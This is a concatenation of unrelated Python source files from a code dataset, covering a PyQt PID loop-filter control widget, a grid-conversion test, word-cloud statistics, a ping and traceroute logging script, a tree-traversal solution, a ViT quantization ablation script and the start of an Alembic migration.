import QtCore, Qt, QtGui, uic, Qwt5\r\nimport pyqtgraph\r\nimport numpy\r\n\r\nfrom ControlWidget import ControlWidget\r\n\r\nimport time\r\n \r\nclass LoopFilterWidget(ControlWidget):\r\n def __init__(self, parent, dev):\r\n super(LoopFilterWidget, self).__init__(parent)\r\n uic.loadUi(\"LoopFilterWidget.ui\", self)\r\n self.dev = dev\r\n self.parent = parent\r\n\r\n self.REG_ADDR_CLR = 0x00080\r\n self.REG_ADDR_LOCK = 0x00084\r\n self.REG_ADDR_COEF_D_FILT = 0x00088\r\n self.REG_ADDR_CMD_IN_D = 0x0008C\r\n self.REG_ADDR_CMD_IN_P = 0x00090\r\n self.REG_ADDR_CMD_IN_I = 0x00094\r\n self.REG_ADDR_CMD_IN_II = 0x00098\r\n self.REG_ADDR_DITHER_EN = 0x0009C\r\n self.REG_ADDR_DITHER_AMPLI = 0x000A0\r\n self.REG_ADDR_DITHER_PERIOD = 0x000A4\r\n\r\n self.REG_ADDR_BRANCH_EN_D = 0x000A8\r\n self.REG_ADDR_BRANCH_EN_P = 0x000AC\r\n self.REG_ADDR_BRANCH_EN_I = 0x000B0\r\n self.REG_ADDR_BRANCH_EN_II = 0x000B4\r\n\r\n self.FS = 125.0e6\r\n\r\n self.curve1 = Qwt5.QwtPlotCurve(\"Asymptotes\")\r\n self.curve1.setPen(Qt.QColor(0, 64, 0))\r\n self.curve1.attach(self.graph)\r\n self.curve1.setData([], [])\r\n\r\n self.curve2 = Qwt5.QwtPlotCurve(\"Actual magnitude\")\r\n self.curve2.setPen(Qt.QColor(0, 255, 0))\r\n self.curve2.attach(self.graph)\r\n self.curve2.setData([], [])\r\n\r\n self.curve3 = Qwt5.QwtPlotCurve(\"Actual phase\")\r\n self.curve3.setPen(Qt.QColor(255, 0, 255))\r\n self.curve3.attach(self.graph)\r\n self.curve3.setYAxis(Qwt5.QwtPlot.yRight)\r\n self.curve3.setData([], [])\r\n\r\n self.grid = Qwt5.QwtPlotGrid()\r\n self.grid.attach(self.graph)\r\n\r\n self.graph.replot()\r\n self.graph.setAxisTitle(Qwt5.QwtPlot.xBottom, \"Frequency [Hz]\")\r\n self.graph.setAxisScaleEngine(Qwt5.QwtPlot.xBottom, Qwt5.QwtLog10ScaleEngine())\r\n #self.graph.setAxisScale(Qwt5.QwtPlot.xBottom, 1e3, 1e6)\r\n self.graph.enableAxis(Qwt5.QwtPlot.yRight)\r\n self.graph.setAxisTitle(Qwt5.QwtPlot.yRight, \"Phase [degrees]\")\r\n #self.graph.setAxisScale(Qwt5.QwtPlot.yRight, -1080, 1e2)\r\n\r\n self.graph.setAxisTitle(Qwt5.QwtPlot.yLeft, \"Magnitude [V/rad]\")\r\n self.graph.setAxisScaleEngine(Qwt5.QwtPlot.yLeft, Qwt5.QwtLog10ScaleEngine())\r\n #self.graph.setAxisScale(Qwt5.QwtPlot.yLeft, 1e-6, 1e2)\r\n self.graph.setCanvasBackground(Qt.QColor(32,32,32))\r\n \r\n # timerPeriod_secs = 0.03\r\n\r\n # self.timer = QtCore.QTimer(self)\r\n # self.timer.timeout.connect(self.update)\r\n # self.timer.start(round(1000*timerPeriod_secs))\r\n\r\n self.checkLockEnabled.clicked.connect(self.checkLockEnabled_clicked)\r\n self.buttonClearIntegrators.clicked.connect(self.buttonClearIntegrators_clicked)\r\n\r\n self.checkBranchEnabledD.clicked.connect(self.checkBranchEnabledP_clicked)\r\n self.checkBranchEnabledP.clicked.connect(self.checkBranchEnabledP_clicked)\r\n self.checkBranchEnabledI.clicked.connect(self.checkBranchEnabledI_clicked)\r\n self.checkBranchEnabledII.clicked.connect(self.checkBranchEnabledII_clicked)\r\n\r\n self.checkDitherEnabled.clicked.connect(self.checkDitherEnabled_clicked)\r\n\r\n self.editDitherPeriod.editingFinished.connect(self.editDitherPeriod_editingFinished)\r\n self.editDitherAmpli.editingFinished.connect(self.editDitherAmpli_editingFinished)\r\n\r\n self.editGainFD.editingFinished.connect(self.editGainFD_editingFinished)\r\n self.editGainD.editingFinished.connect(self.editGainD_editingFinished)\r\n self.editGainP.editingFinished.connect(self.editGainP_editingFinished)\r\n self.editGainI.editingFinished.connect(self.editGainI_editingFinished)\r\n self.editGainII.editingFinished.connect(self.editGainII_editingFinished)\r\n\r\n self.checkFlipPlotSign.clicked.connect(self.update_transfer_function)\r\n \r\n def update(self):\r\n pass\r\n\r\n def update_transfer_function(self):\r\n\r\n\r\n freq_axis = numpy.logspace(-2,8, num=1000, endpoint=False);\r\n wn = 2*numpy.pi*freq_axis/self.FS\r\n\r\n zrec = numpy.exp(-1j*wn)\r\n\r\n bFlipSign = self.checkFlipPlotSign.isChecked()\r\n\r\n try:\r\n cn = float(self.editGainFD.text()) / float(2**24)\r\n Kd = 0.0\r\n Kp = 0.0\r\n Ki = 0.0\r\n Kii = 0.0\r\n if self.checkBranchEnabledD.isChecked():\r\n Kd = float(self.editGainD.text())\r\n if self.checkBranchEnabledP.isChecked():\r\n Kp = float(self.editGainP.text())\r\n if self.checkBranchEnabledI.isChecked():\r\n Ki = float(self.editGainI.text())\r\n if self.checkBranchEnabledII.isChecked():\r\n Kii = float(self.editGainII.text())\r\n except ValueError:\r\n print(\"Bad value\")\r\n pass\r\n\r\n asympt_DF = numpy.absolute(Kd*cn)*numpy.ones(wn.shape)\r\n asympt_D = numpy.absolute(Kd)*numpy.absolute(wn)\r\n asympt_P = numpy.absolute(Kp)*numpy.ones(wn.shape)\r\n asympt_I = numpy.absolute(Ki)/numpy.absolute(wn)\r\n asympt_II = numpy.absolute(Kii)/(numpy.absolute(wn)**2)\r\n\r\n asympt = numpy.minimum(asympt_DF, asympt_D)\r\n asympt = numpy.maximum(asympt, asympt_P)\r\n asympt = numpy.maximum(asympt, asympt_I)\r\n asympt = numpy.maximum(asympt, asympt_II)\r\n\r\n actual_d = Kd*(zrec**4)*(1-zrec)*cn/(1+(-1+cn)*zrec)\r\n actual_p = Kp*(zrec**3)\r\n actual_i = Ki*(zrec**8)*zrec/(1-zrec)\r\n actual_ii= Kii*(zrec**12)*(zrec/(1-zrec))**2\r\n\r\n pid_scaling = (1048576.0/(2.0*numpy.pi*65536/2.0))\r\n\r\n asympt = asympt * pid_scaling\r\n\r\n actual_function = (actual_d + actual_p + actual_i + actual_ii)*pid_scaling\r\n if bFlipSign:\r\n actual_function = -actual_function\r\n\r\n magn = numpy.absolute(actual_function)\r\n rangle = (360.0/(2.0*numpy.pi))*numpy.angle(actual_function)\r\n\r\n log_magn = 10.0*numpy.log10(magn)\r\n log_asympt = 10.0*numpy.log10(asympt)\r\n\r\n self.curve1.setData(freq_axis, asympt)\r\n self.curve2.setData(freq_axis, magn)\r\n self.curve3.setData(freq_axis, rangle)\r\n #self.graph.setAxisScale(Qwt5.QwtPlot.yLeft, numpy.amin(log_magn), numpy.amax(log_magn))\r\n self.graph.replot()\r\n\r\n scaling_to_hertz = float(self.FS)/(2.0*numpy.pi)\r\n strInfo = \"\"\r\n if Kd != 0.0:\r\n strInfo += \"D-P crossing : %g Hz\\n\" % float(scaling_to_hertz*numpy.absolute(Kp/Kd))\r\n strInfo += \"D cutoff : %g Hz\\n\" % float(scaling_to_hertz*numpy.absolute(cn))\r\n if Kp != 0.0:\r\n strInfo += \"P-I crossing : %g Hz\\n\" % float(scaling_to_hertz*numpy.absolute(Ki/Kp))\r\n strInfo += \"P-II crossing : %g Hz\\n\" % float(scaling_to_hertz*numpy.sqrt(numpy.absolute(Kii/Kp)))\r\n if Ki != 0.0:\r\n strInfo += \"II-I crossing : %g Hz\\n\" % float(scaling_to_hertz*numpy.absolute(Kii/Ki))\r\n\r\n\r\n self.textInfo.setPlainText(strInfo)\r\n\r\n\r\n \r\n def float_to_hdr_gain_code(self, gain, max_shifts=None):\r\n MAX_SHIFTERS = 6\r\n if max_shifts is None:\r\n max_shifts = MAX_SHIFTERS\r\n if max_shifts > MAX_SHIFTERS:\r\n ValueError(\"Unsupported number of shifters\")\r\n \r\n if gain == 0.0:\r\n return (0, 0.0)\r\n \r\n MINIMUM_GAIN = (2.0**-16.0)\r\n MAXIMUM_GAIN = (2.0**8.0)\r\n\r\n curr_mant = gain;\r\n \r\n n_right_shifts = 0\r\n while (abs(curr_mant) < MINIMUM_GAIN or n_right_shifts < max_shifts) and (abs(curr_mant)*256.0 <= MAXIMUM_GAIN):\r\n n_right_shifts += 1\r\n curr_mant *= 256.0\r\n \r\n n_left_shifts = 0\r\n while (abs(curr_mant) > MAXIMUM_GAIN):\r\n n_left_shifts += 1\r\n curr_mant /= 256.0\r\n \r\n gain_mant = round((2.0**16.0)*curr_mant)\r\n \r\n actual_gain = (2.0**-16.0) * gain_mant * 256.0**(n_left_shifts-n_right_shifts)\r\n \r\n if n_right_shifts and n_left_shifts:\r\n raise Exception(\"Both right shifts and left shifts\")\r\n \r\n code = 0x80000000\r\n if n_right_shifts != 0 and n_left_shifts == 0:\r\n code = 0x00000000\r\n\r\n n_shifts = n_right_shifts+n_left_shifts \r\n \r\n shift_codes = [0x00000000, 0x02000000, 0x06000000, 0x0E000000, 0x1E000000, 0x3E000000, 0x7E000000]\r\n code |= shift_codes[int(n_shifts)]\r\n\r\n mant_mask = 0x01FFFFFF\r\n code |= (int(gain_mant) & mant_mask)\r\n \r\n return (code, actual_gain)\r\n\r\n \r\n \r\n# def float_to_hdr_gain_code(self, gain, max_shifts=None):\r\n# MAX_SHIFTERS = 6\r\n# if max_shifts is None:\r\n# max_shifts = MAX_SHIFTERS\r\n# if max_shifts > MAX_SHIFTERS:\r\n# ValueError(\"Unsupported number of shifters\")\r\n# \r\n# if gain == 0.0:\r\n# return (0, 0.0)\r\n#\r\n# log256_gain = numpy.log(numpy.abs(gain))/numpy.log(256.0)\r\n# log256_sign = numpy.sign(log256_gain)\r\n# n_shifts = numpy.floor(numpy.abs(log256_gain))\r\n# gain_mant = numpy.round((2.0**16.0)* gain * 256.0**(-log256_sign*n_shifts))\r\n#\r\n# if n_shifts > max_shifts:\r\n# n_shifts = max_shifts\r\n#\r\n# actual_gain = (2.0**-16.0) * gain_mant * 256.0**(log256_sign*n_shifts)\r\n#\r\n# code = 0x80000000\r\n# if int(log256_sign) == -1:\r\n# code = 0x00000000\r\n#\r\n# shift_codes = [0x00000000, 0x02000000, 0x06000000, 0x0E000000, 0x1E000000, 0x3E000000, 0x7E000000]\r\n# code |= shift_codes[int(n_shifts)]\r\n#\r\n# mant_mask = 0x01FFFFFF\r\n# code |= (int(gain_mant) & mant_mask)\r\n#\r\n# return (code, actual_gain)\r\n\r\n def hdr_gain_code_to_float(self, code):\r\n log256_sign = -1.0\r\n if (int(code) & 0x80000000):\r\n log256_sign = 1.0\r\n\r\n n_shifts = 0.0\r\n\r\n if (int(code) & 0x40000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x20000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x10000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x08000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x04000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x02000000):\r\n n_shifts += 1.0\r\n\r\n mant_mask = 0x01FFFFFF\r\n gain_mant = int(code) & mant_mask\r\n if (gain_mant & 0x01000000):\r\n gain_mant = gain_mant - 0x02000000\r\n\r\n actual_gain = (2.0**-16.0) * gain_mant * 256.0**(log256_sign*n_shifts)\r\n\r\n return actual_gain\r\n\r\n def update_content(self):\r\n\r\n self.checkBranchEnabledD.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_D)))\r\n self.checkBranchEnabledP.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_P)))\r\n self.checkBranchEnabledI.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_I)))\r\n self.checkBranchEnabledII.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_II)))\r\n\r\n self.checkLockEnabled.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_LOCK)))\r\n self.buttonClearIntegrators.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CLR)))\r\n\r\n self.checkDitherEnabled.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_DITHER_EN)))\r\n\r\n self.editDitherPeriod.setText(str(self.dev.read_Zynq_register_uint32(self.REG_ADDR_DITHER_PERIOD)))\r\n self.editDitherAmpli.setText(str(self.dev.read_Zynq_register_uint32(self.REG_ADDR_DITHER_AMPLI)))\r\n\r\n self.editGainFD.setText(str(self.dev.read_Zynq_register_int32(self.REG_ADDR_COEF_D_FILT)))\r\n self.editGainD.setText( \"%.16f\"%(self.hdr_gain_code_to_float(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CMD_IN_D))))\r\n self.editGainP.setText( \"%.16f\"%(self.hdr_gain_code_to_float(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CMD_IN_P))))\r\n self.editGainI.setText( \"%.16f\"%(self.hdr_gain_code_to_float(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CMD_IN_I))))\r\n self.editGainII.setText(\"%.16f\"%(self.hdr_gain_code_to_float(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CMD_IN_II))))\r\n \r\n self.update_transfer_function()\r\n\r\n def checkBranchEnabledD_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_D , int(self.checkBranchEnabledD.isChecked()))\r\n self.update_transfer_function()\r\n def checkBranchEnabledP_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_P , int(self.checkBranchEnabledP.isChecked()))\r\n self.update_transfer_function()\r\n def checkBranchEnabledI_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_I , int(self.checkBranchEnabledI.isChecked()))\r\n self.update_transfer_function()\r\n def checkBranchEnabledII_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_II , int(self.checkBranchEnabledII.isChecked()))\r\n self.update_transfer_function()\r\n\r\n def checkDitherEnabled_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_DITHER_EN, int(self.checkDitherEnabled.isChecked()))\r\n\r\n def checkLockEnabled_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_LOCK, int(self.checkLockEnabled.isChecked()))\r\n\r\n def buttonClearIntegrators_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_CLR, int(self.buttonClearIntegrators.isChecked()))\r\n\r\n\r\n def editDitherPeriod_editingFinished(self):\r\n try:\r\n val = int(self.editDitherPeriod.text())\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_DITHER_PERIOD, val)\r\n except ValueError:\r\n pass\r\n def editDitherAmpli_editingFinished(self):\r\n try:\r\n val = int(self.editDitherAmpli.text())\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_DITHER_AMPLI, val)\r\n except ValueError:\r\n pass\r\n\r\n def fd_coef_to_cutoff(self, coef, fs):\r\n a = (float(2**24) - float(coef))/float(2**24)\r\n return (float(fs)*a)/(float(2.0*numpy.pi))\r\n\r\n def cutoff_to_fd_coef(self, cutoff, fs):\r\n coef = (float(2.0*numpy.pi)*float(2**24))*float(cutoff)/(float(fs))\r\n if coef > 2**24-1:\r\n coef = 2**24-1\r\n if coef < 0:\r\n coef = 0\r\n\r\n def editGainFD_editingFinished(self):\r\n try:\r\n val = int(self.editGainFD.text())\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_COEF_D_FILT, val)\r\n self.update_transfer_function()\r\n except ValueError:\r\n pass\r\n\r\n def editGainD_editingFinished(self):\r\n try:\r\n val = float(self.editGainD.text())\r\n (code, act) = self.float_to_hdr_gain_code(val, 0)\r\n self.editGainD.setText(\"%.16f\"%(act))\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_CMD_IN_D, code)\r\n self.update_transfer_function()\r\n except ValueError:\r\n pass\r\n\r\n def editGainP_editingFinished(self):\r\n try:\r\n val = float(self.editGainP.text())\r\n (code, act) = self.float_to_hdr_gain_code(val, 0)\r\n self.editGainP.setText(\"%.16f\"%(act))\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_CMD_IN_P, code)\r\n self.update_transfer_function()\r\n except ValueError:\r\n pass\r\n\r\n def editGainI_editingFinished(self):\r\n try:\r\n val = float(self.editGainI.text())\r\n (code, act) = self.float_to_hdr_gain_code(val, 3)\r\n self.editGainI.setText(\"%.16f\"%(act))\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_CMD_IN_I, code)\r\n self.update_transfer_function()\r\n except ValueError:\r\n pass\r\n\r\n def editGainII_editingFinished(self):\r\n try:\r\n val = float(self.editGainII.text())\r\n (code, act) = self.float_to_hdr_gain_code(val, 6)\r\n self.editGainII.setText(\"%.16f\"%(act))\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_CMD_IN_II, code)\r\n self.update_transfer_function()\r\n except ValueError:\r\n pass\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n app = QtGui.QApplication(sys.argv) \r\n test = LoopFilterWidget(None, None)\r\n \r\n gain = -10\r\n #test.float_to_hdr_gain_code_v2(gain, 6)\r\n (code, actual_gain) = test.float_to_hdr_gain_code(gain, 3)\r\n recomp_gain = test.hdr_gain_code_to_float(code)\r\n print(\"%g -> 0x%08X -> %g, %g\\n\" % (gain, code, actual_gain, recomp_gain))\r\n \r\n app.exec_()\r\n ","repo_name":"hugoiko/MZILock","sub_path":"Python/LoopFilterWidget.py","file_name":"LoopFilterWidget.py","file_ext":"py","file_size_in_byte":16838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23874597994","text":"import os\n\nimport xtgeo\nfrom xtgeo.common import XTGeoDialog\n\nimport xtgeoapp_convgrd3dfmt.cg3f as xx\n\nxtg = XTGeoDialog()\nlogger = xtg.basiclogger(__name__)\n\nTDX = xtg.tmpdir\nif not os.path.exists(TDX):\n os.makedirs(TDX)\n\nrfile1 = \"tests/data/REEK.EGRID\"\nrfile2 = \"tests/data/REEK.UNRST\"\n\n\ndef test_convert_grid_format_egrid():\n \"\"\"Convert an ECLIPSE egrid to roff\"\"\"\n\n outfile = os.path.join(TDX, \"reek_grid.roff\")\n\n xx.main([\"--file\", rfile1, \"--output\", outfile, \"--mode\", \"grid\", \"--standardfmu\"])\n\n gg = xtgeo.grid3d.Grid(outfile)\n assert gg.nactive == 35838\n\n\ndef test_convert_grid_format_restart():\n \"\"\"Convert an ECLIPSE SOIL from restart to roff\"\"\"\n\n outfile = os.path.join(TDX, \"reek_grid.roff\")\n\n xx.main(\n [\n \"--file\",\n rfile2,\n \"--output\",\n outfile,\n \"--mode\",\n \"restart\",\n \"--propnames\",\n \"SOIL\",\n \"--dates\",\n \"19991201\",\n \"--standardfmu\",\n ]\n )\n\n assert 1 == 1\n","repo_name":"equinor/xtgeoapp-convgrd3dfmt","sub_path":"tests/test_convert_grid_format.py","file_name":"test_convert_grid_format.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41732808597","text":"import json\nimport responses\nimport logging\nimport operator\nfrom sqlalchemy import func\nfrom model import db, WordCloud\n\nlogging.basicConfig(level=logging.INFO)\n\n\nasync def search(*args, **kwargs):\n\n logging.info(f'Recieved {kwargs}')\n\n stat_funcs = {\n 'most_used_word': _get_most_used_word,\n 'word_frequency': _get_word_frequency,\n }\n func = stat_funcs[kwargs['stat']]\n params = {}\n\n query = WordCloud.query\n\n words = await query.gino.all()\n words_dump = [word.dump() for word in words]\n params['words'] = words_dump\n if words is None:\n return responses.not_found()\n else:\n response = await func(params)\n return responses.get(response)\n\n\nasync def _get_most_used_word(params):\n\n def _get_frequency_dict(words):\n dictionary = {}\n for word in words:\n if word in dictionary.keys():\n dictionary[word] += 1\n else:\n dictionary[word] = 1\n return dictionary\n\n db_rows = params['words']\n words = [row['word'] for row in db_rows]\n freq_dict = _get_frequency_dict(words)\n \n most_frequent = max(freq_dict.items(), key=operator.itemgetter(1))[0]\n return {'most_used_word': most_frequent}\n\n\nasync def _get_word_frequency(params):\n\n words_to_freq = await db.select(\n [\n WordCloud.word,\n db.func.count(db.func.distinct(WordCloud.source))\n ]\n ).group_by(\n WordCloud.word\n ).gino.all()\n\n return [{k: v for k, v in words_to_freq if v is not None}]","repo_name":"washington-and-lee-mock-convention/mock-con-2020-word-cloud","sub_path":"api/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35583213135","text":"##################################\n# Ping Utility\n### Made by Hiten Sethiya\nimport requests\nimport csv\nimport time\n\nurl = \"http://www.spfld.com/cgi-bin/ping\"\ntrace_url = \"https://api.hackertarget.com/mtr/\"\n\nhosts = [\"flipkart.com\"#Add more\n ]\nfor host in hosts:\n query = {'q': host}\n response = requests.request(\"GET\", trace_url, params=query)\n with open('ping_traceroutes.txt', 'a') as tr_record:\n tr_record.write(\"----------------------------------\\n\"+host + \" Local Time :: \" + str(time.strftime(\"%d %b %Y %H:%M:%S\", time.localtime())) + \"\\n\")\n tr_record.write(response.text)\n print(\"printed traceroute\")\n ## Because only multiple size data of only one host is required \n if(host==hosts[0]):\n sizes = [\"64\", \"128\", \"256\", \"512\", \"1024\", \"2048\"]\n else:\n sizes = [\"64\"]\n for size in sizes:\n querystring = {\"remote_host\": host, \"dns\": \"on\", \"count\": \"20\", \"size\": size}\n response = requests.request(\"GET\", url, params=querystring)\n flag = 1\n for index, line in enumerate(response.text.splitlines()):\n if line[0:3] == 'rtt':\n i = index\n flag = 0\n if flag == 1:\n print(host, size, ' Failed')\n continue\n print(host, size, 'Done', 'response = ', response.text.splitlines()[i])\n with open('ping_results.csv', 'a') as csvfile:\n fieldnames = ['Host', 'Frame Size','Packets Recieved','Packets Transmitted','Packet loss','Total Time', 'RTT Min', 'RTT Avg', 'RTT Max', 'RTT Mdev', 'Time']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow({'Host': host,\n 'Frame Size': size,\n 'Packets Recieved':response.text.splitlines()[i-1].split()[3].strip(),\n 'Packets Transmitted':response.text.splitlines()[i-1].split()[0].strip(),\n 'Packet loss':response.text.splitlines()[i-1].split()[5].strip(),\n 'Total Time':response.text.splitlines()[i-1].split()[9].strip(),\n 'RTT Min': response.text.splitlines()[i].split('/')[3].split('=')[1].strip()+'ms',\n 'RTT Avg': response.text.splitlines()[i].split('/')[4]+'ms',\n 'RTT Max': response.text.splitlines()[i].split('/')[5]+'ms',\n 'RTT Mdev': response.text.splitlines()[i].split('/')[6].split()[0].strip()+'ms',\n 'Time': time.strftime(\"%d %b %Y %H:%M:%S\", time.localtime())\n })\nprint('Finished! Check the results in \\'ping_results.csv\\' and \\'ping_traceroutes.txt\\' Enjoy!!')\n","repo_name":"HitenSethiya/Scripts","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27679654192","text":"from test_framework import generic_test\n\n\ndef preorder_traversal(tree):\n\n path, result = [tree], []\n while path:\n curr = path.pop()\n if curr:\n result.append(curr.data)\n path += [curr.right, curr.left]\n return result\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main(\"tree_preorder.py\", 'tree_preorder.tsv',\n preorder_traversal))\n","repo_name":"CapedHero/python-epi-judge","sub_path":"epi_judge_python_solutions/tree_preorder.py","file_name":"tree_preorder.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"10112660218","text":"from torch.nn.modules import module\nfrom test_vit import *\nfrom quant_layers.conv import MinMaxQuantConv2d\nfrom quant_layers.linear import MinMaxQuantLinear, PTQSLQuantLinear\nfrom quant_layers.matmul import MinMaxQuantMatMul, PTQSLQuantMatMul\nimport matplotlib.pyplot as plt\nfrom utils.net_wrap import wrap_certain_modules_in_net\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nimport pickle as pkl\nfrom itertools import product\nimport types\nfrom utils.quant_calib import HessianQuantCalibrator, QuantCalibrator\nfrom utils.models import get_net\nimport time\n\ndef test_all_ablation(name, cfg_modifier=lambda x: x, calib_size=32):\n quant_cfg = init_config(\"PTQ4ViT\")\n quant_cfg = cfg_modifier(quant_cfg)\n\n net = get_net(name)\n\n wrapped_modules=net_wrap.wrap_modules_in_net(net,quant_cfg)\n \n g=datasets.ViTImageNetLoaderGenerator('/datasets/imagenet','imagenet',32,32,16, kwargs={\"model\":net})\n test_loader=g.test_loader()\n calib_loader=g.calib_loader(num=calib_size)\n \n quant_calibrator = HessianQuantCalibrator(net,wrapped_modules,calib_loader,sequential=False,batch_size=4) # 16 is too big for ViT-L-16\n quant_calibrator.batching_quant_calib()\n\n acc = test_classification(net,test_loader, description=quant_cfg.ptqsl_linear_kwargs[\"metric\"])\n\n print(f\"model: {name} \\n\")\n print(f\"calibration size: {calib_size} \\n\")\n print(f\"bit settings: {quant_cfg.bit} \\n\")\n print(f\"ptqsl_conv2d_kwargs: {quant_cfg.ptqsl_conv2d_kwargs} \\n\")\n print(f\"ptqsl_linear_kwargs: {quant_cfg.ptqsl_linear_kwargs} \\n\")\n print(f\"ptqsl_matmul_kwargs: {quant_cfg.ptqsl_matmul_kwargs} \\n\")\n print(f\"accuracy: {acc} \\n\\n\")\n\nclass cfg_modifier():\n def __init__(self, **kwargs):\n for name, value in kwargs.items():\n setattr(self,name,value)\n\n def __call__(self, cfg):\n # bit setting\n cfg.bit = self.bit_setting\n cfg.w_bit = {name: self.bit_setting[0] for name in cfg.conv_fc_name_list}\n cfg.a_bit = {name: self.bit_setting[1] for name in cfg.conv_fc_name_list}\n cfg.A_bit = {name: self.bit_setting[1] for name in cfg.matmul_name_list}\n cfg.B_bit = {name: self.bit_setting[1] for name in cfg.matmul_name_list}\n\n # conv2d configs\n cfg.ptqsl_conv2d_kwargs[\"n_V\"] = self.linear_ptq_setting[0]\n cfg.ptqsl_conv2d_kwargs[\"n_H\"] = self.linear_ptq_setting[1]\n cfg.ptqsl_conv2d_kwargs[\"metric\"] = self.metric\n cfg.ptqsl_conv2d_kwargs[\"search_round\"] = self.search_round\n cfg.ptqsl_conv2d_kwargs[\"parallel_eq_n\"] = 1 # maximum 7 , reserve 4Gb for gradient \n cfg.ptqsl_conv2d_kwargs[\"init_layerwise\"] = False\n\n # linear configs\n cfg.ptqsl_linear_kwargs[\"n_V\"] = self.linear_ptq_setting[0]\n cfg.ptqsl_linear_kwargs[\"n_H\"] = self.linear_ptq_setting[1]\n cfg.ptqsl_linear_kwargs[\"n_a\"] = self.linear_ptq_setting[2]\n cfg.ptqsl_linear_kwargs[\"metric\"] = self.metric\n cfg.ptqsl_linear_kwargs[\"search_round\"] = self.search_round\n cfg.ptqsl_linear_kwargs[\"parallel_eq_n\"] = 1 # maximum 7, reserve 4Gb for gradient \n cfg.ptqsl_linear_kwargs[\"init_layerwise\"] = False\n\n # matmul configs\n cfg.ptqsl_matmul_kwargs[\"metric\"] = self.metric\n cfg.ptqsl_matmul_kwargs[\"search_round\"] = self.search_round\n cfg.ptqsl_matmul_kwargs[\"parallel_eq_n\"] = 1 # maximum 3!\n cfg.ptqsl_matmul_kwargs[\"init_layerwise\"] = False\n\n # ablation\n cfg.no_softmax = self.no_softmax\n cfg.no_postgelu = self.no_postgelu\n\n return cfg\n\nif __name__=='__main__':\n args = parse_args()\n\n names = [\n \"vit_small_patch16_224\",\n \"vit_base_patch16_224\",\n \"vit_base_patch16_384\",\n ]\n metrics = [\"hessian\", \"cosine\"]\n linear_ptq_settings = [(1,1,1)] # n_V, n_H, n_a\n search_rounds = [3]\n calib_sizes = [32]\n bit_settings = [(8,8), (6,6)] # weight, activation\n no_softmaxs = [True, False]\n no_postgelus = [True, False]\n\n cfg_list = []\n for name, metric, linear_ptq_setting, search_round, calib_size, bit_setting, no_softmax, no_postgelu in product(names, metrics, linear_ptq_settings, search_rounds, calib_sizes, bit_settings, no_softmaxs, no_postgelus):\n cfg_list.append({\n \"name\": name,\n \"cfg_modifier\":cfg_modifier(linear_ptq_setting=linear_ptq_setting, metric=metric, search_round=search_round, bit_setting=bit_setting, no_softmax=no_softmax, no_postgelu=no_postgelu),\n \"calib_size\":calib_size,\n })\n \n if args.multiprocess:\n multiprocess(test_all_ablation, cfg_list, n_gpu=args.n_gpu)\n else:\n for cfg in cfg_list:\n test_all_ablation(**cfg)","repo_name":"hahnyuan/PTQ4ViT","sub_path":"example/test_ablation.py","file_name":"test_ablation.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"3"} +{"seq_id":"43024581564","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nRename tables\n\nRevision ID: 06bfbc92f67d\nRevises: eeb23d9b4d00\nCreate Date: 2018-11-06 04:36:58.531272\n\"\"\"\n\nfrom alembic import op\n\nrevision = 